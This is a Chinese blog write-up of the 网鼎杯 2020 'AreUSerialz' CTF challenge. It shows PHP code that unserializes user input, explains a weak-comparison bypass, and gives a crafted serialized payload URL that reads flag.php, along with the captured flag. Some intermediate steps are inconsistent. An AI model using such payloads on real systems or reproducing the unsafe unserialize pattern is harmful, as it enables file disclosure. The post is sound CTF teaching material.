[网鼎杯 2020 青龙组]AreUSerialz 1

最新推荐文章于 2024-06-19 17:26:17 发布

无独有偶o

最新推荐文章于 2024-06-19 17:26:17 发布

阅读量208

点赞数

分类专栏： CTF 文章标签： php 安全

本文链接：https://blog.csdn.net/weixin_44477223/article/details/115234508

版权

CTF 专栏收录该内容

13 篇文章 0 订阅

订阅专栏

题目运用的知识点

反序列化
弱比较

内容

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

解题

进行代码审计，初步推断需要运用反序列化和弱比较。

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;//这个函数要求对应的ASCLL码为32~125

ord()函数是chr()函数（对于8位的ASCII字符串）或unichr()函数（对于Unicode对象）的配对函数，它以一个字符（长度为1的字符串）作为参数，返回对应的 ASCII 数值，或者 Unicode 数值，如果所给的 Unicode 字符超出了你的 Python 定义范围，则会引发一个 TypeError 的异常。

我们利用反序列化进行绕过，这里需要注意一下它用的是protrected属性,%00*%00

序列化

<?php
class FileHandler {

protected $op;
protected $filename;
protected $content;
}
$a = new FileHandler();
$b = serialize($a);
$c = base64_encode($b);
echo $c;

输出
O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";S:8:"flag.php";S:10:"\00*\00content";S:7:"oavinci";}

这里我们注意一下在进行序列化时需要代码会执行__destruct()魔术方法，process()使用的是弱比较op==“2”，可以通过弱类型绕过。
op=="2"为true$op：op=="1"的时候会进入write方法处理，op=="2"的时候进入read方法处理。
绕过方法：op=2，这里的2是整数int类型，op=2时，op==="2"为false

构造PL
http://d460917f-6385-4ec6-b478-4c8aa91f466c.node3.buuoj.cn/?str=O:11:%22FileHandler%22:3:{s:2:%22op%22;i:2;s:8:%22filename%22;s:8:%22flag.php%22;s:7:%22content%22;N;}
拿到flag
$flag='flag{2f86a606-e55c-4218-bb2a-ce3c70881d8a}

无独有偶o

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[网鼎杯 2020 青龙组]AreUSerialz 1

题目运用的知识点反序列化弱比较内容<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile";
复制链接

扫一扫

专栏目录